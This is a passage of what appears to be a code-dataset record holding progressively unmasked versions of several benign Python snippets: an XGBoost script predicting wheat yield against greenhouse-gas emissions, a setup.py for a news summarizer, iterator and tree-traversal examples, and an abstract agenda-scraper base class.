rand_row)\n<mask token>\nfig, ax1 = plt.subplots()\nn_amount = [x[0] for x in preds]\nyield_p = [x[1] for x in preds]\nghg_p = [x[2] for x in preds]\ncolor = 'tab:red'\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f\"GHG and yield predictions (Area: {rand_row['Area']} ha)\")\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\nax2 = ax1.twinx()\ncolor = 'tab:blue'\nax2.set_ylabel('CO2 (kg)', color=color)\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\nprint(n_amount)\nfig.tight_layout()\nplt.show()\n",
"step-4": "from xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport numpy as np\nfrom ghg import GHGPredictor\npredictor = GHGPredictor()\ndataset_df = pd.read_csv('db-wheat.csv', index_col=0)\ndataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',\n 'Previous crop'])\ndataset = dataset_df_2.to_numpy()\nX, Y = dataset[:, :-1], dataset[:, -1:]\nseed = 10\ntest_size = 0.2\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=\n test_size, random_state=seed)\nmodel = XGBRegressor()\nmodel.fit(X_train, Y_train)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\ny_pred = model.predict(X_test)\nY_test = map(lambda x: x[0], Y_test)\nres = zip(y_pred, Y_test)\nghg_predictor = GHGPredictor()\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\nimport random\nrand_ind = random.randrange(0, len(dataset))\nrand_row = dataset_df.iloc[rand_ind]\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\npreds = predict(model, rand_row)\nimport matplotlib.pyplot as plt\nfig, ax1 = plt.subplots()\nn_amount = [x[0] for x in preds]\nyield_p = [x[1] for x in preds]\nghg_p = [x[2] for x in preds]\ncolor = 'tab:red'\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f\"GHG and yield predictions (Area: {rand_row['Area']} ha)\")\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\nax2 = ax1.twinx()\ncolor = 'tab:blue'\nax2.set_ylabel('CO2 (kg)', color=color)\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\nprint(n_amount)\nfig.tight_layout()\nplt.show()\n",
"step-5": "from xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport numpy as np\n\nfrom ghg import GHGPredictor\n\npredictor = GHGPredictor()\n\ndataset_df = pd.read_csv(\"db-wheat.csv\", index_col=0)\n\n# print(dataset_df.iloc[1])\n\ndataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop', 'Previous crop'])\n# print(dataset_df_2)\n\ndataset = dataset_df_2.to_numpy()\n\n# print(dataset)\n\nX, Y = dataset[:, :-1], dataset[:, -1:]\n\n# print(X)\n# print(Y)\n\nseed = 10\ntest_size = 0.2\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\n\n# print(len(X_train))\n# print(len(X_test))\n# print(len(Y_train))\n# print(len(Y_test))\n\nmodel = XGBRegressor()\nmodel.fit(X_train, Y_train)\n\n# print(model)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\n\n# print(X_test.shape)\ny_pred = model.predict(X_test)\n# predictions = [round(value) for value in y_pred]\n\nY_test = map(lambda x: x[0], Y_test)\n# print(Y_test)\n\nres = zip(y_pred, Y_test)\n\n# print(list(res))\n\nghg_predictor = GHGPredictor()\n\ndef predict(model, row):\n preds = []\n # print(row)\n # print(row.).shape)\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n\n # new_row = new_row.iloc[0]\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop', 'Previous crop', 'Yield'])\n # print(new_row.labels)\n # new_row = new_row.tolist()\n\n # print(new_row)\n # print(type(new_row))\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n # print(new_row)\n pred = model.predict(new_row)\n\n\n row_df = pd.DataFrame([row_copy])\n\n fuel_ghg = predictor.fuel_ghg_emissions(row_df[\"Area\"], unit=\"kg\")\n \n fuel_ghg = fuel_ghg.values[0]\n\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'], row_df['Area'], row_df['Crop'], row_df['Yield'])\n\n ms_ghg = ms_ghg.values[0]\n\n\n sum_ghg = fuel_ghg + ms_ghg\n\n area = row_df['Area'].iloc[0]\n # print(area)\n\n # print(sum_ghg)\n # print(row_df['N'])\n\n # print(sum_ghg)\n\n # GHG\n # fuel = ghg_predictor.fuel_ghg_emissions()\n\n preds.append([nitrogen, pred[0], sum_ghg])\n\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n\n return preds\n\n# accuracy = accuracy_score(Y_test, predictions)\n# print(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\nimport random\n\nrand_ind = random.randrange(0, len(dataset))\nrand_row = dataset_df.iloc[rand_ind]\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\n# rand_row = rand_row[:-1]\n\npreds = predict(model, rand_row)\n\nimport matplotlib.pyplot as plt\n\nfig, ax1 = plt.subplots()\n\nn_amount = [x[0] for x in preds]\nyield_p = [x[1] for x in preds]\nghg_p = [x[2] for x in preds]\n\ncolor = 'tab:red'\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f'GHG and yield predictions (Area: {rand_row[\"Area\"]} ha)')\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n\nax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n\ncolor = 'tab:blue'\nax2.set_ylabel('CO2 (kg)', color=color) # we already handled the x-label with ax1\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\n\nprint(n_amount)\n\nfig.tight_layout() # 
otherwise the right y-label is slightly clipped\nplt.show()\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='sgcharts-pointer-generator', version=__version__,
python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',
'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',
'*.tests.*', 'tests.*', 'tests']), include_package_data=True,
description='News Summarizer')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__version__ = '2.0'
setup(name='sgcharts-pointer-generator', version=__version__,
python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',
'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',
'*.tests.*', 'tests.*', 'tests']), include_package_data=True,
description='News Summarizer')
<|reserved_special_token_1|>
from setuptools import setup, find_packages
__version__ = '2.0'
setup(name='sgcharts-pointer-generator', version=__version__,
python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',
'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',
'*.tests.*', 'tests.*', 'tests']), include_package_data=True,
description='News Summarizer')
<|reserved_special_token_1|>
from setuptools import setup, find_packages
__version__ = '2.0'
setup(
name='sgcharts-pointer-generator',
version=__version__,
python_requires='>=3.5.0',
install_requires=[
'tensorflow==1.10.0',
'pyrouge==0.1.3',
'spacy==2.0.12',
'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'
],
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
include_package_data=True,
description='News Summarizer'
)
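# Typical usage, assuming a standard setuptools workflow (not stated in the
# source): run `pip install .` from the project root to build and install the
# package with the pinned dependencies above.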
|
flexible
|
{
"blob_id": "e52b01cc7363943f5f99b1fa74720c6447b1cfae",
"index": 6266,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='sgcharts-pointer-generator', version=__version__,\n python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',\n 'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',\n '*.tests.*', 'tests.*', 'tests']), include_package_data=True,\n description='News Summarizer')\n",
"step-3": "<mask token>\n__version__ = '2.0'\nsetup(name='sgcharts-pointer-generator', version=__version__,\n python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',\n 'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',\n '*.tests.*', 'tests.*', 'tests']), include_package_data=True,\n description='News Summarizer')\n",
"step-4": "from setuptools import setup, find_packages\n__version__ = '2.0'\nsetup(name='sgcharts-pointer-generator', version=__version__,\n python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',\n 'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',\n '*.tests.*', 'tests.*', 'tests']), include_package_data=True,\n description='News Summarizer')\n",
"step-5": "from setuptools import setup, find_packages\n\n__version__ = '2.0'\n\nsetup(\n name='sgcharts-pointer-generator',\n version=__version__,\n python_requires='>=3.5.0',\n install_requires=[\n 'tensorflow==1.10.0',\n 'pyrouge==0.1.3',\n 'spacy==2.0.12',\n 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'\n ],\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n description='News Summarizer'\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(1, count + 1):
something = '='
num1, num2 = map(int, input().split())
if num1 > num2:
something = '>'
elif num1 < num2:
something = '<'
print(f'#{i} {something}')
<|reserved_special_token_1|>
count = int(input())
for i in range(1, count + 1):
something = '='
num1, num2 = map(int, input().split())
if num1 > num2:
something = '>'
elif num1 < num2:
something = '<'
print(f'#{i} {something}')
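# Example session (hypothetical input, not from the original source):
# input: 3, then "1 2", "5 5", "9 4"  ->  output: "#1 <", "#2 =", "#3 >"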
|
flexible
|
{
"blob_id": "abcefa0a3312e158517ec8a15421d1d07220da6a",
"index": 5271,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, count + 1):\n something = '='\n num1, num2 = map(int, input().split())\n if num1 > num2:\n something = '>'\n elif num1 < num2:\n something = '<'\n print(f'#{i} {something}')\n",
"step-3": "count = int(input())\nfor i in range(1, count + 1):\n something = '='\n num1, num2 = map(int, input().split())\n if num1 > num2:\n something = '>'\n elif num1 < num2:\n something = '<'\n print(f'#{i} {something}')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import random
a = random.sample(range(100), 10)
print("All items: {}".format(a))
it = iter(a) # call a.__iter__()
print("Num01: {}".format(next(it))) # call it.__next__()
print("Num02: {}".format(next(it)))
print("Num03: {}".format(it.__next__()))
it = iter(a)
i = 1
while True:
try:
x = next(it)
print("Num{:02d}: {}".format(i, x))
except StopIteration:
break
i += 1
class Node():
def __init__(self, value):
self._value = value
self._children = []
def __repr__(self):
return 'Node({!r})'.format(self._value)
def add_child(self, node):
self._children.append(node)
def __iter__(self):
return iter(self._children)
root = Node(0)
root.add_child(Node(1))
root.add_child(Node(2))
for x in root:
print(x)
class Node2():
def __init__(self, value):
self._value = value
self._children = []
self._idx = 0
def __repr__(self):
return 'Node2({!r})'.format(self._value)
def add_child(self, node):
self._children.append(node)
def __iter__(self):
self._idx = 0
        return self # return self: this object is its own iterator, so it must implement __next__()
def __next__(self):
if self._idx < len(self._children):
idx = self._idx
self._idx += 1
return self._children[idx]
raise StopIteration
root = Node2(10)
root.add_child(Node2(11))
root.add_child(Node2(22))
for x in root:
print(x)
class Node3():
def __init__(self, value):
self._value = value
self._children = []
self._idx = 0
def __repr__(self):
return 'Node3({!r})'.format(self._value)
def add_child(self, node):
self._children.append(node)
def has_children(self):
return len(self._children) != 0
def __iter__(self):
self._idx = 0
        return self # return self: this object is its own iterator, so it must implement __next__()
def __next__(self):
if self._idx < len(self._children):
idx = self._idx
self._idx += 1
return self._children[idx]
raise StopIteration
def recur_show(root):
print(root)
if root.has_children():
for node in root:
recur_show(node)
def recur_show2(root):
if root.has_children():
for node in root:
recur_show2(node)
print(root)
# 0
#
# 10 20 30
#
# 11 12 31
root = Node3(0)
c1 = Node3(10)
c2 = Node3(20)
c3 = Node3(30)
c11 = Node3(11)
c12 = Node3(12)
c31 = Node3(31)
root.add_child(c1)
root.add_child(c2)
root.add_child(c3)
c1.add_child(c11)
c1.add_child(c12)
c3.add_child(c31)
print("==================")
recur_show(root)
print("==================")
recur_show2(root)
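# Expected output of the two traversals over the tree sketched above, assuming
# the construction code is unchanged:
# recur_show  (parent first):   Node3(0) Node3(10) Node3(11) Node3(12) Node3(20) Node3(30) Node3(31)
# recur_show2 (children first): Node3(11) Node3(12) Node3(10) Node3(20) Node3(31) Node3(30) Node3(0)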
|
normal
|
{
"blob_id": "f5513bea4ca5f4c2ac80c4bf537a264a4052d1e9",
"index": 8866,
"step-1": "<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n <mask token>\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n\n def __repr__(self):\n return 'Node({!r})'.format(self._value)\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport random\n\na = random.sample(range(100), 10)\nprint(\"All items: {}\".format(a))\n\nit = iter(a) # call a.__iter__()\n\nprint(\"Num01: {}\".format(next(it))) # call it.__next__()\nprint(\"Num02: {}\".format(next(it)))\nprint(\"Num03: {}\".format(it.__next__()))\n\nit = iter(a)\ni = 1\nwhile True:\n try:\n x = next(it)\n print(\"Num{:02d}: {}\".format(i, x))\n except StopIteration:\n break\n i += 1\n\n\nclass Node():\n def __init__(self, value):\n self._value = value\n self._children = []\n\n def __repr__(self):\n return 'Node({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n return iter(self._children)\n \nroot = Node(0)\nroot.add_child(Node(1))\nroot.add_child(Node(2))\n\nfor x in root:\n print(x)\n\nclass Node2():\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self # 返回自己, 说明自己是迭代器,须实现__next__()\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\nroot = Node2(10)\nroot.add_child(Node2(11))\nroot.add_child(Node2(22))\n\nfor x in root:\n print(x)\n\nclass Node3():\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self # 返回自己, 说明自己是迭代器,须实现__next__()\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\ndef recur_show(root):\n print(root)\n if root.has_children():\n for node in root:\n recur_show(node)\n\ndef recur_show2(root):\n if root.has_children():\n for node in root:\n recur_show2(node)\n print(root)\n\n# 0\n# \n# 10 20 30\n# \n# 11 12 31\n\nroot = Node3(0)\nc1 = Node3(10)\nc2 = Node3(20)\nc3 = Node3(30)\nc11 = Node3(11)\nc12 = Node3(12)\nc31 = Node3(31)\nroot.add_child(c1)\nroot.add_child(c2)\nroot.add_child(c3)\nc1.add_child(c11)\nc1.add_child(c12)\nc3.add_child(c31)\n\nprint(\"==================\")\nrecur_show(root)\nprint(\"==================\")\nrecur_show2(root)\n",
"step-ids": [
12,
13,
15,
16,
24
]
}
|
[
12,
13,
15,
16,
24
] |
<|reserved_special_token_0|>
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
<|reserved_special_token_0|>
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
        process_agenda takes the data of one agenda document (for instance, an HTML document).
        A processed agenda will have to process each of its items. Each agenda item might
        be at a different location or contained within the agenda itself. If an item is contained within
        the agenda, proceed to process_agenda_item with its data. If not, scrape_agenda_item should be
        called with the location of the agenda item.
        The result of process_agenda will be a dict that can be saved by store_agenda and store_agenda_items.
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
@abstractmethod
def scrape(self):
"""
Scrape processes all agendas in self._agenda_locations
        It calls process_agenda on all items in _agenda_locations with
data downloaded from those locations.
The result of scrape is the stored agendas and agenda items.
"""
pass
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
        process_agenda takes the data of one agenda document (for instance, an HTML document).
        A processed agenda will have to process each of its items. Each agenda item might
        be at a different location or contained within the agenda itself. If an item is contained within
        the agenda, proceed to process_agenda_item with its data. If not, scrape_agenda_item should be
        called with the location of the agenda item.
        The result of process_agenda will be a dict that can be saved by store_agenda and store_agenda_items.
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
@abstractmethod
def _process_agenda_item(self, agenda_item_data, agenda_item_id,
meeting_id, meeting_time):
"""
        The result of process_agenda_item will be a dict that can be stored by store_agenda_item.
"""
pass
<|reserved_special_token_0|>
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
@abstractmethod
def scrape(self):
"""
Scrape processes all agendas in self._agenda_locations
        It calls process_agenda on all items in _agenda_locations with
data downloaded from those locations.
The result of scrape is the stored agendas and agenda items.
"""
pass
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
        process_agenda takes the data of one agenda document (for instance, an HTML document).
        A processed agenda will have to process each of its items. Each agenda item might
        be at a different location or contained within the agenda itself. If an item is contained within
        the agenda, proceed to process_agenda_item with its data. If not, scrape_agenda_item should be
        called with the location of the agenda item.
        The result of process_agenda will be a dict that can be saved by store_agenda and store_agenda_items.
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
@abstractmethod
def _process_agenda_item(self, agenda_item_data, agenda_item_id,
meeting_id, meeting_time):
"""
        The result of process_agenda_item will be a dict that can be stored by store_agenda_item.
"""
pass
@abstractmethod
def _store_agenda(self, processed_agenda, committee):
"""
Calls to DB should be here for the main agenda content
"""
pass
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
<|reserved_special_token_1|>
from abc import ABC, abstractmethod, abstractproperty
from pytz import timezone
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
@abstractmethod
def scrape(self):
"""
Scrape processes all agendas in self._agenda_locations
        It calls process_agenda on all items in _agenda_locations with
data downloaded from those locations.
The result of scrape is the stored agendas and agenda items.
"""
pass
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
        process_agenda takes the data of one agenda document (for instance, an HTML document).
        A processed agenda will have to process each of its items. Each agenda item might
        be at a different location or contained within the agenda itself. If an item is contained within
        the agenda, proceed to process_agenda_item with its data. If not, scrape_agenda_item should be
        called with the location of the agenda item.
        The result of process_agenda will be a dict that can be saved by store_agenda and store_agenda_items.
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
@abstractmethod
def _process_agenda_item(self, agenda_item_data, agenda_item_id,
meeting_id, meeting_time):
"""
        The result of process_agenda_item will be a dict that can be stored by store_agenda_item.
"""
pass
@abstractmethod
def _store_agenda(self, processed_agenda, committee):
"""
Calls to DB should be here for the main agenda content
"""
pass
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
|
flexible
|
{
"blob_id": "ec224924206c41cf8203c6aa8002ddf6b0e70e9b",
"index": 1116,
"step-1": "<mask token>\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n <mask token>\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n <mask token>\n <mask token>\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-2": "<mask token>\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n\n @abstractmethod\n def scrape(self):\n \"\"\"\n Scrape processes all agendas in self._agenda_locations\n It calls process agenda on all items in _agenda_locations with \n data downloaded from those locations.\n The result of scrape is the stored agendas and agenda items.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and 